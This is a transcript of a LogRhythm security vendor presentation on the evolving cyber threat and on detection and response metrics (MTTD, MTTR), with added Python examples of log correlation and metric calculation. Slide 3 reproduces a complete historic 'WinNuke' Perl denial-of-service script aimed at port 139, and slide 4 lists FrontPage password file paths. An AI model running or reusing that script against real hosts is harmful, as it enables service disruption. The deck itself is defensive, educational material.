1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm.

Presentation transcript:

2 | Company Confidential When Times Were Simpler

3 | Company Confidential Early Attacks

```perl
#!/usr/bin/perl
# Historic "nuke" script reproduced on the slide (it appears twice in the
# transcript; shown once here). It connects to TCP port 139 (NetBIOS session
# service) and sends a short payload flagged as out-of-band (MSG_OOB) data, the
# 1990s "WinNuke" technique that crashed unpatched TCP/IP stacks of that era.
# use strict;
use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]";                  # target hostname from the command line
$p = 139 if (!$ARGV[1]);          # default port 139, as written on the slide
if (!$h) { print "A hostname must be provided. Ex: ..."; }   # usage text is cut off on the slide
$in_addr = (gethostbyname($h))[4];
$addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!;
select S; $| = 1; select STDOUT;  # unbuffer the socket handle
print "Nuking: $h:$p\n";
send S,"Sucker",MSG_OOB;          # the out-of-band payload
print "Nuked!\n";
close S;
```

4 | Company Confidential Early Attacks
\_vti_pvt\
  o Administrators.pwd
  o Authors.pwd

5 | Company Confidential Fast forward to 2015

6 | Company Confidential The Economist, November 2015 “Attackers will still get in…the only safe assumption is that your network is breached, and to make sure that you deal with intruders promptly—not after the 200-odd days which it typically takes. Many networks have no means of detecting a breach at all.”

7 | Company Confidential Attackers Are Getting In
…% of surveyed firms were compromised by a successful cyber-attack in … (The CyberEdge Group, 2015 Cyberthreat Defense Report (1))
“There are two kinds of big companies in the United States: those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.” – James Comey, Director FBI, October 5, 2014
Note 1. Survey includes 624 IT security professionals from North America and Europe representing organizations with more than 500 global employees

8 | Company Confidential The Expanding Cyber Threat
Motive: Political, Ideological, Criminal

9 | Company Confidential Ever Increasing Cyber Risk
66% Growth in Security Incidents (Source: PwC’s The Global State of Information Security Survey)
Threat landscape shown on the slide: MALWARE, INTRUSION, Breach, Fraud; Inappropriate Network Use, Zero Day Attacks, Credit Card Theft, Compliance Violations, Custom Malware, Insider Threats, Phishing, State Sponsored Attacks, Privilege Account Abuse, Spear Phishing, Denial of Service, Compromised Endpoints, Brute Forcing, Unintended Disclosure, Trojan Horses, MiTM Attacks, Ransomware, Payment Card Fraud, Social Engineering, Data Exfiltration, Whaling, Hijacking, Keyloggers

10 | Company Confidential Damaging Data Breaches

11 | Company Confidential A New Security Approach is Required
Prevention-centric approaches can stop common threats. However, advanced threats:
  o Require a broader view to recognize
  o Only emerge over time
  o Get lost in the noise
Big Data Analytics can best detect these threats. An excellent Security Intelligence Platform delivers:
  o Big Data analytics to identify advanced threats
  o Qualified and prioritized detection, reducing noise
  o Incident response workflow orchestration and automation
  o Capabilities to prevent high-impact breaches & damaging cyber incidents

12 | Company Confidential Prevention-Centric Approaches are Insufficient
Prevention-Centric Approaches (Firewalls, Intrusion Prevention Systems, Anti-Virus/Malware, Sandboxing) address Preventable Threats: Previously Seen, Signature-Based, Static, One-Dimensional
Modern Cyber Threats: Advanced, Stealthy, Persistent, Dynamic, Multi-Dimensional
205: Median number of days that companies were compromised before detection of threat - Mandiant M-Trends 2015
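Slides 11 and 12 contrast signature-based prevention with analytics that take a broader view and correlate events over time. The following is an added illustration of that contrast, not LogRhythm's code: a signature check that matches a known-bad file hash, beside a correlation rule that links a burst of failed logins, a successful login and a large outbound transfer for the same user. The log format, field names, the known-bad hash list, the sample events and the thresholds are all assumptions constructed for this example.

```python
"""Signature matching versus time-window correlation over constructed log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in an assumed "<ISO time> <source> key=value ..." layout.
SAMPLE_LOG = """\
2015-03-02T08:00:01 auth  user=alice src=10.1.1.20 result=fail
2015-03-02T08:00:03 auth  user=alice src=10.1.1.20 result=fail
2015-03-02T08:00:05 auth  user=alice src=10.1.1.20 result=fail
2015-03-02T08:00:07 auth  user=alice src=10.1.1.20 result=fail
2015-03-02T08:00:09 auth  user=alice src=10.1.1.20 result=fail
2015-03-02T08:00:11 auth  user=alice src=10.1.1.20 result=success
2015-03-02T08:14:00 proxy user=alice dst=203.0.113.9 bytes_out=734003200
2015-03-02T08:20:00 av    host=ws-07 sha256=aaaa1111
2015-03-02T09:05:00 auth  user=bob src=10.1.1.31 result=fail
2015-03-02T09:05:40 auth  user=bob src=10.1.1.31 result=success
2015-03-02T09:30:00 proxy user=bob dst=198.51.100.5 bytes_out=51200
"""

# Constructed placeholder "signature": a hash already known to be bad.
KNOWN_BAD_HASHES = {"aaaa1111"}

# Correlation thresholds (assumptions for the example).
FAIL_THRESHOLD = 5                 # failed logins within WINDOW before a success
WINDOW = timedelta(minutes=5)
EXFIL_BYTES = 100 * 1024 * 1024    # outbound volume within EXFIL_WINDOW after the success
EXFIL_WINDOW = timedelta(minutes=30)

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")


def parse_events(text):
    """Turn log lines into dicts with a datetime 'ts' and a 'source' field."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, source, rest = LINE_RE.match(line).groups()
        fields = dict(kv.split("=", 1) for kv in rest.split())
        fields["ts"] = datetime.fromisoformat(ts)
        fields["source"] = source
        events.append(fields)
    return events


def signature_hits(events, known_bad):
    """Signature-based view: only events carrying an already-known hash match."""
    return [e for e in events if e.get("sha256") in known_bad]


def correlated_alerts(events):
    """Analytics view: brute-forced login followed by a large outbound transfer."""
    by_user = defaultdict(list)
    for e in events:
        if "user" in e:
            by_user[e["user"]].append(e)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for i, e in enumerate(evs):
            if e["source"] != "auth" or e.get("result") != "success":
                continue
            fails = [f for f in evs[:i]
                     if f["source"] == "auth" and f.get("result") == "fail"
                     and e["ts"] - f["ts"] <= WINDOW]
            if len(fails) < FAIL_THRESHOLD:
                continue
            out = sum(int(x["bytes_out"]) for x in evs[i + 1:]
                      if x["source"] == "proxy" and x["ts"] - e["ts"] <= EXFIL_WINDOW)
            if out >= EXFIL_BYTES:
                alerts.append({"user": user, "failed_logins": len(fails),
                               "bytes_out": out, "success_at": e["ts"]})
    return alerts


def run_detection(text, known_bad):
    """Run both detectors over the same events and return their findings."""
    events = parse_events(text)
    return {"signature_hits": signature_hits(events, known_bad),
            "correlated_alerts": correlated_alerts(events)}


if __name__ == "__main__":
    for name, findings in run_detection(SAMPLE_LOG, KNOWN_BAD_HASHES).items():
        print(name, findings)
```

On the sample data the signature check finds only the one event whose hash was already known, while the correlation rule surfaces alice's brute-forced login and the 700 MiB transfer that followed it, a chain that no single event and no hash would have revealed; bob's single failed login stays below the threshold and is not reported.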

13 | Company Confidential Prevention-Centric is Obsolete “Advanced targeted attacks make prevention-centric strategies obsolete. Securing enterprises in 2020 will require a shift to information and people-centric security strategies, combined with pervasive internal monitoring and sharing of security intelligence.” “By 2020, 60% of enterprise information security budgets will be allocated for rapid detection and response approaches up from less than 10% in 2013.” - Neil MacDonald,

14 | Company Confidential Faster Detection & Response Reduces Risk
MEAN-TIME-TO-DETECT (MTTD): The average time it takes to recognize a threat requiring further analysis and response efforts
MEAN-TIME-TO-RESPOND (MTTR): The average time it takes to respond and ultimately resolve the incident
Chart: MTTD & MTTR on a timeframe axis running from Months, Weeks, Days and Hours down to Minutes; High Vulnerability / Exposed to Threats at the slow end, Low Vulnerability / Resilient to Threats at the fast end
As organizations improve their ability to quickly detect and respond to threats, the risk of experiencing a damaging breach is greatly reduced

15 | Company Confidential Data Exfiltration Can Be Avoided
Advanced threats take their time and leverage the holistic attack surface
Attack progression: Reconnaissance → Initial Compromise → Command & Control → Lateral Movement → Target Attainment → Exfiltration / Corruption / Disruption
Early neutralization = no damaging cyber incident or data breach

16 | Company Confidential Vigilance Requires Visibility at Every Vector
Holistic Attack Surface: User, Network, Endpoint

17 | Company Confidential Security Intelligence Platform
Threat Lifecycle Management: End-to-End Detection & Response Workflow
TIME TO DETECT
  Collect & Generate: Forensic Sensor Data, Security Event Data, Log & Machine Data (example sources)
  Detect & Prioritize: Machine Analytics, User Analytics
  Qualify: Assess threat to determine risk and whether full investigation is necessary
TIME TO RESPOND
  Investigate: Analyze threat to determine nature and extent of the incident
  Neutralize: Implement countermeasures to mitigate threat and associated risk
  Recover: Cleanup, Report, Review, Adapt

18 | Company Confidential Delivering a Path to Success
Security Intelligence Maturity Levels
  Level 0: Blind
  Level 1: Minimally Compliant
  Level 2: Securely Compliant
  Level 3: Vigilant
  Level 4: Resilient
Chart: MEAN-TIME-TO-DETECT (MTTD) and MEAN-TIME-TO-RESPOND (MTTR) timeframe (Months, Weeks, Days, Hours, Minutes) plotted against Level 0 through Level 4, moving from Exposed to Threats to Resilient to Threats
Greater threat resiliency is achieved at higher levels of security intelligence maturity
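Slides 14, 17 and 18 define MTTD and MTTR and place them on a Months-to-Minutes axis. The following added example, not LogRhythm's code, computes both metrics from incident records whose timestamps follow the Threat Lifecycle Management stages on slide 17 (compromise, qualification, recovery), buckets the results onto that axis, and checks how far along the slide 15 attack progression each incident got before it was neutralized. The record layout, the three sample incidents and the hour boundaries chosen for the buckets are assumptions made for this example.

```python
"""MTTD / MTTR computed from Threat Lifecycle Management stage timestamps."""
from datetime import datetime
from statistics import mean

# Attack progression from slide 15, earliest stage first.
ATTACK_STAGES = ["Reconnaissance", "Initial Compromise", "Command & Control",
                 "Lateral Movement", "Target Attainment", "Exfiltration"]
DAMAGING_FROM = ATTACK_STAGES.index("Target Attainment")

# Constructed sample incidents. MTTD spans compromised..qualified (Collect,
# Detect & Prioritize, Qualify); MTTR spans qualified..recovered (Investigate,
# Neutralize, Recover). Timestamp layout is an assumption for the example.
INCIDENTS = [
    {"id": "INC-1", "compromised": "2015-01-05T02:00", "qualified": "2015-01-05T02:45",
     "recovered": "2015-01-05T09:15", "stage_reached": "Command & Control"},
    {"id": "INC-2", "compromised": "2015-02-01T00:00", "qualified": "2015-02-04T12:00",
     "recovered": "2015-02-06T12:00", "stage_reached": "Lateral Movement"},
    # 205 days undetected: the Mandiant M-Trends 2015 median quoted on slide 12.
    {"id": "INC-3", "compromised": "2014-06-01T00:00", "qualified": "2014-12-23T00:00",
     "recovered": "2015-01-06T00:00", "stage_reached": "Exfiltration"},
]

_FMT = "%Y-%m-%dT%H:%M"


def _hours_between(start, end):
    delta = datetime.strptime(end, _FMT) - datetime.strptime(start, _FMT)
    return delta.total_seconds() / 3600


def time_to_detect_hours(inc):
    """Hours from initial compromise until the threat was qualified for response."""
    return _hours_between(inc["compromised"], inc["qualified"])


def time_to_respond_hours(inc):
    """Hours from qualification until the incident was resolved."""
    return _hours_between(inc["qualified"], inc["recovered"])


def mttd_hours(incidents):
    return mean(time_to_detect_hours(i) for i in incidents)


def mttr_hours(incidents):
    return mean(time_to_respond_hours(i) for i in incidents)


def timeframe(hours):
    """Map a duration onto the slide 14/18 axis. The boundaries are assumptions."""
    if hours < 1:
        return "Minutes"
    if hours < 24:
        return "Hours"
    if hours < 24 * 7:
        return "Days"
    if hours < 24 * 30:
        return "Weeks"
    return "Months"


def reached_damaging_stage(inc):
    """True when the attacker reached Target Attainment or beyond before neutralization."""
    return ATTACK_STAGES.index(inc["stage_reached"]) >= DAMAGING_FROM


def summarize(incidents):
    """Fleet-level MTTD/MTTR plus per-incident buckets and damaging-incident count."""
    return {
        "mttd_hours": mttd_hours(incidents),
        "mttr_hours": mttr_hours(incidents),
        "mttd_timeframe": timeframe(mttd_hours(incidents)),
        "mttr_timeframe": timeframe(mttr_hours(incidents)),
        "damaging_incidents": sum(reached_damaging_stage(i) for i in incidents),
        "per_incident": {i["id"]: (timeframe(time_to_detect_hours(i)),
                                   timeframe(time_to_respond_hours(i)))
                         for i in incidents},
    }


if __name__ == "__main__":
    for key, value in summarize(INCIDENTS).items():
        print(f"{key}: {value}")
```

One 205-day incident pulls the mean MTTD into the Months bucket even though the other two were qualified within minutes and days, which is why a median (the statistic the Mandiant figure on slide 12 uses) is worth reporting alongside the mean when tracking progress through the maturity levels.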

19 | Company Confidential Market Leadership: Certifications & Validations, Industry Awards, Company Awards (Company of the Year), Industry Analysts

20 | Company Confidential THANK YOU